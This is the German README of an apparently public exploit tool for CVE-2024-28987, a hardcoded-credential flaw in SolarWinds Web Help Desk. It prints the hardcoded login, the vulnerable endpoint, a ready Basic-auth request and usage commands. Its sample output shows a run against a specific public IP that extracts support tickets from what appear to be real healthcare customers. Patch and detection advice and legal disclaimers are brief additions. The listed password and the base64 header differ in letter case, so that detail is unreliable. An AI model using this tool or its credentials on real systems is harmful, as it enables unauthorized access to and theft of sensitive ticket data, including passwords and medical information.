
CVE-2024-28987 — Updated!
**CVE-2024-28987** ist eine kritische Schwachstelle in SolarWinds Web Help Desk (WHD), die es entfernten Angreifern ermöglicht, mithilfe **fest verdrahteter Anmeldedaten** auf sensible Ticketinformationen zuzugreifen. Diese Schwachstelle hat einen **CVSS-Score von 9,1 (Kritisch)** und wird derzeit aktiv in freier Wildbahn ausgenutzt.
CVE-2024-28987 - SolarWinds Web Help Desk Exploit für hartcodierte Anmeldedaten
⚠️ HAFTUNGSAUSSCHLUSS: Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben.
📋 Übersicht
CVE-2024-28987 ist eine kritische Schwachstelle in SolarWinds Web Help Desk (WHD), die es Remote-Angreifern ermöglicht, über hartcodierte Anmeldedaten auf sensible Ticketinformationen zuzugreifen. Diese Schwachstelle hat einen CVSS-Score von 9.1 (Kritisch) und wird derzeit aktiv in freier Wildbahn ausgenutzt.
Details zur Schwachstelle
| Attribut | Wert |
|---|---|
| CVE-ID | CVE-2024-28987 |
| CVSS-Score | 9.1 (Kritisch) |
| CWE | CWE-798 (Hartcodierte Anmeldedaten) |
| Betroffene Produkte | SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1 |
| Patch-Version | 12.8.3 Hotfix 2 |
| Ausnutzung | Aktiv in freier Wildbahn ausgenutzt |
| Aufnahme in CISA KEV | 15. Oktober 2024 |
Auswirkungen
Ein nicht authentifizierter Angreifer kann:
- Auf alle Support-Tickets mit sensiblen Informationen zugreifen
- Temporäre Passwörter, Zurücksetzungsanfragen und freigegebene Service-Anmeldedaten einsehen
- CRUD-Operationen an Tickets über den
/OrionTickets-Endpunkt durchführen - Potenziell auf andere Systeme im Netzwerk zugreifen
🔧 Funktionen
- ✅ Automatische Schwachstellenerkennung - Testet auf hartcodierte Anmeldedaten
- ✅ Ticket-Extraktion - Ruft alle Tickets von verwundbaren Systemen ab
- ✅ Scan auf sensible Daten - Identifiziert Passwörter, Anmeldedaten, personenbezogene Daten und medizinische Daten
- ✅ Mehrere Ausgabeformate - JSON und JSONL für große Datensätze
- ✅ Interaktive Vorschau - Zeigt die ersten 3 Tickets vor der Extraktion an
- ✅ Keine Abhängigkeiten - Verwendet nur die Python-Standardbibliothek
- ✅ Farbige Ausgabe - Verbesserte Lesbarkeit durch ANSI-Farben
- ✅ Fehlerbehandlung - Graceful Handling von Verbindungsfehlern
🚀 Schnellstart
Voraussetzungen
- Python 3.6 oder höher
- Keine externen Abhängigkeiten erforderlich!
Installation
# Repository klonen
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# Skript ausführbar machen
Verwendung
bash
# Mit Ziel-URL als Argument
python3 cve-2024-28987.py http://ziel-ip:port
# Interaktiver Modus (fragt nach dem Ziel)
python3 cve-2024-28987.py
# Beispiel mit einem verwundbaren Ziel
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 Ausgabebeispiel
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ Schwachstelle durch hartcodierte Anmeldedaten ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] Prüfe http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] Ziel ist VERWUNDBAR!
[+] 42 Tickets gefunden
======================================================================
[📋] Ticket-Vorschau (Erste 3 Tickets)
======================================================================
Ticket #1
├── ID: 5690
├── Kunde: UBS Portao Vermelho
├── Status: Offen
├── Detail: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
Ticket #2
├── ID: 5691
├── Kunde: UBS Centro
├── Status: In Bearbeitung
├── Detail: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] Suche nach sensiblen Daten
======================================================================
[!] Mögliche PASSWORT-Daten in Ticket #5723 gefunden
└── detail: Bitte setzen Sie mein Passwort für den Systemzugriff zurück...
[?] Möchten Sie ALLE Tickets in eine Datei extrahieren? [j/N]: j
[*] Speichere unter: 138_94_193_65_8098_tickets.json
[✓] Erfolgreich gespeichert: 138_94_193_65_8098_tickets.json
[*] Dateigröße: 42.847 Bytes
[*] Gesamtzahl Tickets: 42
[*] Fertig!
GitHub: https://github.com/Darabium
📁 Dateistruktur
CVE-2024-28987/
├── cve-2024-28987.py # Haupt-Exploit-Skript
├── README.md # Diese Datei
└── LICENSE # MIT-Lizenz
Ausgabedateien
Wenn Sie Tickets extrahieren, werden die folgenden Dateien erstellt:
Standard-JSON-Format (wird immer erstellt)
138_94_193_65_8098_tickets.json
JSONL-Format (wird erstellt, wenn > 100 Tickets)
***_tickets.jsonl 🔍 Technische Details Hartcodierte Anmeldedaten python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" Betroffener Endpunkt text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ Beispiel-HTTP-Anfrage http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: verwundbares-ziel:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ Behebung Sofortmaßnahmen Sofort auf SolarWinds Web Help Desk Version 12.8.3 Hotfix 2 oder höher aktualisieren
Protokolle auf verdächtigen Zugriff auf den /OrionTickets-Endpunkt prüfen
Auf unbefugten Zugriff auf Ticketdaten überwachen
Alle Anmeldedaten zurücksetzen, die möglicherweise in Tickets offengelegt wurden
Alle Support-Tickets auf potenzielle Datenlecks überprüfen
Erkennungsbefehle bash
Auf Ausnutzungsversuche in Protokollen prüfen
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
Auf unbefugte Zugriffsmuster prüfen
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
Aktuelle Version prüfen
cat /opt/WebHelpDesk/version.txt 🚨 CISA-KEV-Hinweis Diese Schwachstelle wurde in den Katalog der Bekannten ausgenutzten Schwachstellen (KEV) von CISA aufgenommen. Organisationen sind verpflichtet, bis zur angegebenen Frist zu patchen.
Datum der Aufnahme: 15. Oktober 2024
Erforderliche Maßnahme: Updates gemäß den Anweisungen des Anbieters anwenden
Frist: 5. November 2024 (21 Tage)
📚 Referenzen NVD CVE-2024-28987
CISA-KEV-Katalog
SolarWinds-Sicherheitshinweis
PEP 668 - Externe Umgebungsverwaltung
🤝 Mitwirken Beiträge sind willkommen! Bitte reichen Sie gerne Pull-Requests ein oder eröffnen Sie Issues.
Richtlinien Repository forken
Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
Pushen Sie den Branch (git push origin feature/AmazingFeature)
Öffnen Sie einen Pull-Request
📝 Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE-Datei für Details.
⚡ Autor Darabium - Erstveröffentlichung - GitHub
⚠️ Wichtige Hinweise Dieses Tool ist für Sicherheitsforschung und Bildungszwecke gedacht
Nicht auf Systemen verwenden, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben
Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools
Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken
Respektieren Sie Datenschutz- und Datenschutzgesetze in Ihrer Rechtsordnung
🌟 Stern-Verlauf Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen ⭐ auf GitHub!
📞 Support Eröffnen Sie ein Issue auf GitHub für Fehlerberichte
Bei Sicherheitsbedenken kontaktieren Sie bitte direkt über GitHub
Mit ❤️ erstellt für Darabium